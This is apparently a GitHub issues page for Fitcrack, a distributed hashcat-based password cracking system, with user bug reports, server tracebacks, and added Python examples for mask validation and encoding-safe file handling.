nesfit / fitcrack
A hashcat-based distributed password cracking system
Home Page: https://fitcrack.fit.vutbr.cz/
License: Other
Hi, when I try to upload a mask file which contains invalid masks (for example ?:?*?=?)), then Webadmin does not reject this and accepts this file.
The Add Job UI properly rejects this.
Seems the regex here does not properly validate masks.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
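A server-side check of the kind the report above asks for, as an added example that is not Fitcrack's code. It assumes hashcat's documented mask syntax (built-in charsets ?l ?u ?d ?h ?H ?s ?a ?b, custom charsets ?1 to ?4, ?? for a literal question mark) and the .hcmask line layout of optional comma-separated custom charsets followed by the mask; all function names and the sample file are constructed for illustration.

```python
BUILTIN = frozenset("ludhHsab")  # hashcat built-in charsets ?l ?u ?d ?h ?H ?s ?a ?b
MAX_CUSTOM = 4                   # custom charsets ?1 .. ?4


def split_fields(line):
    """Split an .hcmask line on unescaped commas; '\\,' is a literal comma."""
    fields, current, i = [], "", 0
    while i < len(line):
        if line.startswith("\\,", i):
            current += ","
            i += 2
        elif line[i] == ",":
            fields.append(current)
            current = ""
            i += 1
        else:
            current += line[i]
            i += 1
    fields.append(current)
    return fields


def check_placeholders(text, defined):
    """Return the problems found in one mask or one charset definition.

    `defined` is how many custom charsets may be referenced (?1..?defined).
    """
    problems, i = [], 0
    while i < len(text):
        if text[i] != "?":
            i += 1  # any other character is a literal
            continue
        if i + 1 == len(text):
            problems.append(f"dangling '?' at offset {i}")
            break
        nxt = text[i + 1]
        if nxt in "1234":
            if int(nxt) > defined:
                problems.append(f"?{nxt} at offset {i} refers to an undefined charset")
        elif nxt != "?" and nxt not in BUILTIN:
            problems.append(f"unknown placeholder ?{nxt} at offset {i}")
        i += 2
    return problems


def validate_hcmask_line(line):
    """Validate one line; an empty list means the line is acceptable."""
    line = line.rstrip("\r\n")
    if not line or line.startswith("#"):
        return []  # blank lines and comments carry no mask (assumption)
    *charsets, mask = split_fields(line)
    if len(charsets) > MAX_CUSTOM:
        return [f"{len(charsets)} custom charsets defined, at most {MAX_CUSTOM} allowed"]
    problems = []
    for number, charset in enumerate(charsets, start=1):
        # Assumption: a charset may only reference lower-numbered charsets.
        for problem in check_placeholders(charset, number - 1):
            problems.append(f"charset {number}: {problem}")
    if not mask:
        problems.append("empty mask")
    problems.extend(check_placeholders(mask, len(charsets)))
    return problems


def validate_mask_file(text):
    """Return {line_number: [problems]} for every line that must be rejected."""
    rejected = {}
    for number, line in enumerate(text.splitlines(), start=1):
        problems = validate_hcmask_line(line)
        if problems:
            rejected[number] = problems
    return rejected


# Constructed sample file; line 3 is the invalid mask quoted in the report.
SAMPLE_HCMASK = "\n".join([
    "?l?l?l?d",
    "?d?l,?1?1?1?u",
    "?:?*?=?)",
    "?l?2",
    "100??",
    "# comment line",
])

if __name__ == "__main__":
    for number, problems in validate_mask_file(SAMPLE_HCMASK).items():
        print(number, problems)
```

Rejecting the whole upload when `validate_mask_file` returns anything keeps the file-upload path consistent with what the Add Job UI already refuses.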
Hello, I am struggling to get the latest dev version running, I get the error:
"The server could not verify that you are authorized to access the URL requested...."
The apache error logs show "Invalid JWT error: Invalid header padding"
Python 3.8.10
Flask 2.0.3
Werkzeug 2.0.3
Hello. I found this issue in tandem with issue #67. When I try to upload a dictionary containing non-ASCII characters and enable "Sort on upload", Fitcrack gives an "An unhandled exception has occurred." error.
As can be seen in the error log, this part of code is responsible for the bug.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/functions.py
Lines 226 to 241 in f2a0232
The open function opens the file in text mode and expects the file to be in ASCII encoding. Since the input file contains non-ASCII characters, reading from the file will eventually raise a UnicodeDecodeError. However, this exception is unhandled and thus causes the "An unhandled exception has occurred." error message to appear.
What's more, given the ungrateful exit caused by the unhandled exception, the dictionary will be only half-added, leaving an orphan file and blocking the adding of a dictionary with the same name, but I discuss this issue more concretely elsewhere (see issue #67).
Given that by default Python on Ubuntu 22.04.2 uses UTF-8 encoding for files created by the open function, I assume Fitcrack somehow changes the default file-I/O encoding in Python to ASCII. This is not documented in the end-user manual, however. It does make sense, as I suppose the vast majority of software does not support non-ASCII characters in passwords.
If Fitcrack by design doesn't support non-ASCII dictionary files, I expect the error message to be something like "Dictionary file cannot contain non-ASCII characters" instead of "An unhandled exception has occurred."
However, the creation of a dictionary file with non-ASCII characters succeeded (!) when trying to upload the same file with "Sort on upload" disabled. If Fitcrack truly does not support non-ASCII dictionaries, this should not have been possible and an error should be raised.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
[Wed Feb 22 17:29:57.968389 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] An unhandled exception occurred.
[Wed Feb 22 17:29:57.968423 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):
[Wed Feb 22 17:29:57.968429 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968434 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968439 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968444 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968449 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968454 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968459 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968463 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968468 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968473 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968478 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968482 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968487 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968503 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968508 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968513 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] l = i.readline()
[Wed Feb 22 17:29:57.968518 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
[Wed Feb 22 17:29:57.968522 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.968527 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)
[Wed Feb 22 17:29:57.968907 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] [2023-02-22 17:29:57,968] ERROR in app: Exception on /dictionary/add [POST]
[Wed Feb 22 17:29:57.968920 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):
[Wed Feb 22 17:29:57.968926 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968931 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968935 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968940 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968945 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968949 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968954 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968958 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968963 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968968 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968972 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968977 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968981 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968986 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968991 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968995 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] l = i.readline()
[Wed Feb 22 17:29:57.969000 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
[Wed Feb 22 17:29:57.969004 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.969017 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)
Call me stupid, but I don't understand what to install on a client node so that it receives work from the master.
Hello,
While trying to set up the Docker version with the comments next to the ports, the compose up errors with this:
ERROR: The Compose file './docker-compose.yml' is invalid because:
services.fitcrack_server.ports is invalid: Invalid port "5000" # Port for WebAdmin backend (5443 for SSL):5000", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]
services.fitcrack_server.ports is invalid: Invalid port "80" # Port for WebAdmin frontend (443 for SSL):80", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]
Hi,
I was trying to make a PCFG from the default "honey.txt" dictionary in Webadmin, I get an "Unhandled exception has occurred".
I found the root cause of the issue:
The PCFG endpoint tries to calculate the keyspace of PCFG.
The code that performs this calculation does this by calling an external script pcfg_mower.py; it then also clamps the value returned by the script to sys.maxsize.
However, with the "honeynet.txt" dictionary, shellExec returns an empty string instead of a string with the number representing the keyspace. Then the integer conversion int(pcfgKeyspace) fails and raises a ValueError, which is unhandled.
If I try to run pcfg_mower.py with the "honeynet" PCFG manually, I get this error:
Traceback (most recent call last):
File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 160, in <module>
pcfg_mower(config)
File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 81, in pcfg_mower
if rules.load_alpha():
File "/var/www/html/fitcrackAPI/pcfg_mower/rules.py", line 74, in load_alpha
for rule in f:
File "/usr/lib/python3.10/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe3 in position 1783: invalid continuation byte
So the pcfg_mower.py script crashes with the "honeynet" PCFG, thus never writing anything to standard output, and shellExec thus returns an empty string. shellExec also doesn't check the return value of the run shell command, so the issue becomes apparent only once Webadmin tries to convert the returned empty string to an integer.
As to why the pcfg_mower script fails: The PCFG generated from the "honeynet.txt" dictionary seems to contain invalid UTF-8 bytes. And indeed, if we take a look at the honeynet.txt dictionary, on line 1218, there is the password "N�o" (hex 4E E3 6F). E3 in this context is an invalid UTF-8 byte, causing decoding to fail. E3 here probably represents some character from an extended-ASCII character set, or it could be junk data—I don't know the supposed encoding of the "honeynet.txt" file.
Looking at the offending code in the pcfg_mower script,
fitcrack/webadmin/fitcrackAPI/pcfg_mower/rules.py
Lines 68 to 80 in 5a2f48e
we can see that the file encoding is manually set to utf-8. It seems it was set to UTF-8 in response to a similar bug with the "darkweb2017" dictionary (52b32a0). This causes the file-read operations to fail with non–UTF-8 files.
A better way would probably be to use open(fname, 'r', encoding="ascii", errors="surrogateescape") as described in the Python docs on how to handle files with unknown encodings, as this way offers both universal-new-line support for file objects and treats each byte as its own character.
So this issue is quite similar to issue #66, where a Webadmin function expects a file to be in ASCII. I'd wager there are more issues like this in the Python code—it's probably best to inspect every instance a file is opened in .py files.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
[Thu Mar 23 13:39:03.887840 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] /var/www/html/fitcrackAPI/src/../pcfg_mower/pcfg_mower.py -i /usr/share/collections/pcfg/honeynet
[Thu Mar 23 13:39:05.895016 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] An unhandled exception occurred.
[Thu Mar 23 13:39:05.895059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.895086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.895093 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] rv = self.dispatch_request()
[Thu Mar 23 13:39:05.895099 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.895106 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.895113 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.895119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.895125 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.895132 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.895138 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.895144 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.895150 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.895157 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.895163 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.895170 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.895177 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.895183 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.895189 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''
[Thu Mar 23 13:39:05.943002 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] [2023-03-23 13:39:05,934] ERROR in app: Exception on /pcfg/makeFromDictionary [POST]
[Thu Mar 23 13:39:05.943059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.943075 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.943086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] rv = self.dispatch_request()
[Thu Mar 23 13:39:05.943094 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.943102 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.943110 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.943119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.943127 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.943174 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.943186 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.943195 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.943204 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.943212 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.943220 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.943228 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.943236 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.943255 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.943273 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''
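The two failure modes reported above (the "Sort on upload" crash on non-ASCII dictionaries in issue #66, and the empty keyspace string in the PCFG report), handled defensively in an added example that is not Fitcrack's code. `sorted_copy`, `keyspace_from_tool` and `KeyspaceError` are hypothetical names; the sort order and the stand-in child commands are assumptions made for the demonstration.

```python
import os
import subprocess
import sys
import tempfile


class KeyspaceError(RuntimeError):
    """The external keyspace tool failed or printed something unusable."""


def sorted_copy(src, dst):
    """Sort a wordlist of unknown encoding and write it to dst atomically.

    errors="surrogateescape" maps every undecodable byte to a lone surrogate
    on read and back to the same byte on write, so no input can raise
    UnicodeDecodeError and no password is altered. Returns the line count.
    """
    with open(src, "r", encoding="ascii", errors="surrogateescape") as fin:
        lines = [line.rstrip("\n") for line in fin]  # universal newlines applied
    lines.sort()
    # Write next to the target, then rename: a failure never leaves a
    # half-written dictionary behind under the final name.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(dst)))
    try:
        with os.fdopen(fd, "w", encoding="ascii",
                       errors="surrogateescape", newline="\n") as fout:
            for line in lines:
                fout.write(line + "\n")
        os.replace(tmp, dst)
    except BaseException:
        os.unlink(tmp)
        raise
    return len(lines)


def keyspace_from_tool(argv, timeout=60):
    """Run a keyspace calculator and return its result, clamped to sys.maxsize.

    Unlike a bare int(stdout), this checks the exit status first and reports
    the tool's own error instead of a ValueError on an empty string.
    """
    proc = subprocess.run(argv, capture_output=True, text=True,
                          errors="replace", timeout=timeout)
    if proc.returncode != 0:
        tail = proc.stderr.strip().splitlines()[-1:] or ["no error output"]
        raise KeyspaceError(f"tool exited with status {proc.returncode}: {tail[0]}")
    out = proc.stdout.strip()
    if not (out.isascii() and out.isdigit()):
        raise KeyspaceError(f"expected an integer on stdout, got {out!r}")
    return min(int(out), sys.maxsize)


if __name__ == "__main__":
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "words.txt")
    dst = os.path.join(workdir, "words_sorted.txt")
    # Constructed sample: CRLF line, the 4E E3 6F entry from the report,
    # a UTF-8 word, and a final line without a newline.
    with open(src, "wb") as f:
        f.write(b"zebra\r\nN\xe3o\ncaf\xc3\xa9\nalpha")
    print(sorted_copy(src, dst), "lines sorted")
    # Stand-in child processes (assumption): one succeeds, one crashes.
    print(keyspace_from_tool([sys.executable, "-c", "print(12570)"]))
    try:
        keyspace_from_tool([sys.executable, "-c", "raise SystemExit(1)"])
    except KeyspaceError as exc:
        print("rejected:", exc)
```

An API endpoint can catch `KeyspaceError` and return a specific message to the user instead of the generic "An unhandled exception has occurred."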
Hi. If I try to add a Markov file or a mask set with a filename that was used in the past but has since been deleted [1], the upload fails with a "File with name test_add.hcmask already exists. Path: /usr/share/collections/masks/test_add.hcmask" error. This behaviour only happens with Markov files and mask sets; other resource files in the Library tab (dictionaries, PCFGs, rules, and charsets) do not exhibit this behaviour.
From what I can see, the problem happens because the code for the delete API endpoints does not remove the actual file.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/endpoints/masks/masks.py
Lines 105 to 116 in f2a0232
Code for the delete endpoints that do not exhibit this problem does perform a file-deletion operation. Like here in the charset endpoint.
If there is no reason for keeping the resource files after deleting them, I expect to be able to reuse filenames without issue. If there is a reason for this behaviour, I expect this to be documented and a more graceful error message to appear.
Given the former is probably the case and that the issue is probably caused by forgetting to add the file-deletion code, I also opened a pull request (#69) that should fix this issue if it really is that simple.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
[1] Deleted using the delete button in Webadmin.
Hello,
I have the same case as #14
I did as mentioned here https://nesfit.github.io/fitcrack/#/guide/hosts?id=using-the-command-line
But step 4. never happens (That's all, your host will soon appear in Webadmin)
I am in the server http://static.ip_address.clients.your-server.de/hosts and the list is always empty.
BR
Hi Team,
Please have a look.
I did all listed here https://github.com/nesfit/fitcrack/blob/master/INSTALL-Installer.md#instubu22
Then I created a folder, make a git clone, and start
Hi,
I've tried to add a host, everything is fine client side, I can see the confirmation but on server side no hosts are added.
BOINC manager shows the project correctly.
Looking for general thoughts on where to look next. I've tried installing Fitcrack over a few different methods and all are coming up to this error.
I've tried the docker version and the installer version on Ubuntu Server 20 and 22 but all come to the same error. Because at this point I am just trying to get the service up and running, I have changed no defaults within the .env and left with localhost and same for the installer version. No errors when going through the build phase or the installation. When jumping onto the webpage "http://localhost/login" I get the error about the API not being available. When trying to debug via docker instructions, I can confirm that an error page is present on the 5000 port "internal server error" rather than something working. I'm including some of the log snippets here from the apache log that may be relevant.
Also checked service. Fitcrack was inactive when checked, but when brought up to be active there was no change in behavior of the WebAdmin on 5000.
[Mon Mar 06 20:57:27.872708 2023] [core:notice] [pid 23491] AH00094: Command line: '/usr/sbin/apache2'
[Mon Mar 06 20:58:05.931414 2023] [mpm_prefork:notice] [pid 23491] AH00170: caught SIGWINCH, shutting down gracefully
[Mon Mar 06 20:58:06.106869 2023] [mpm_prefork:notice] [pid 23627] AH00163: Apache/2.4.52 (Ubuntu) mod_wsgi/4.9.0 Python/3.10 configured -- resuming normal operations
[Mon Mar 06 20:58:06.106936 2023] [core:notice] [pid 23627] AH00094: Command line: '/usr/sbin/apache2'
[Mon Mar 06 20:58:39.051592 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'.
[Mon Mar 06 20:58:39.052016 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
[Mon Mar 06 20:58:39.053251 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] Traceback (most recent call last):
[Mon Mar 06 20:58:39.053295 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in <module>
[Mon Mar 06 20:58:39.053303 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from app import app as application
[Mon Mar 06 20:58:39.053310 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in <module>
[Mon Mar 06 20:58:39.053315 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace
[Mon Mar 06 20:58:39.053322 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in <module>
[Mon Mar 06 20:58:39.053328 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.database import db
[Mon Mar 06 20:58:39.053334 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/database/__init__.py", line 8, in <module>
[Mon Mar 06 20:58:39.053340 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] db = SQLAlchemy()
[Mon Mar 06 20:58:39.053346 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 754, in __init__
[Mon Mar 06 20:58:39.053352 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] _include_sqlalchemy(self, query_class)
[Mon Mar 06 20:58:39.053371 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 108, in _include_sqlalchemy
[Mon Mar 06 20:58:39.053377 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] for key in module.__all__:
[Mon Mar 06 20:58:39.053392 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] AttributeError: module 'sqlalchemy' has no attribute '__all__'
[Mon Mar 06 20:58:41.082267 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'.
[Mon Mar 06 20:58:41.082367 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
Hi,
On one of my test workstations, the integrated intel graphics reports utilization and temperature of -1. This causes the trickler process to die, as it appears to overflow to 2^64-1 when the database query is made, causing the database query to fail and the program to exit.
[2022/06/11 09:31:19] Executing command: trickler --variety fitcrack
2022-06-11 09:31:19.7255 Starting trickle handler
2022-06-11 09:31:19.7269 Got trickle-up message from hostId #2:
<result_name>fitcrack_1654952461_0_6506_1654952782_0</result_name>
<time>1654952843</time>
<workunit_name>fitcrack_1654952461_0</workunit_name>
<progress>0</progress>
<total_speed>5030128</total_speed>
<device_1_name>NVIDIA GeForce GTX 1080 Ti</device_1_name>
<device_1_type>GPU</device_1_type>
<device_1_speed>2644704</device_1_speed>
<device_1_temp>57</device_1_temp>
<device_1_util>2</device_1_util>
<device_3_name>Radeon RX 580 Series</device_3_name>
<device_3_type>GPU</device_3_type>
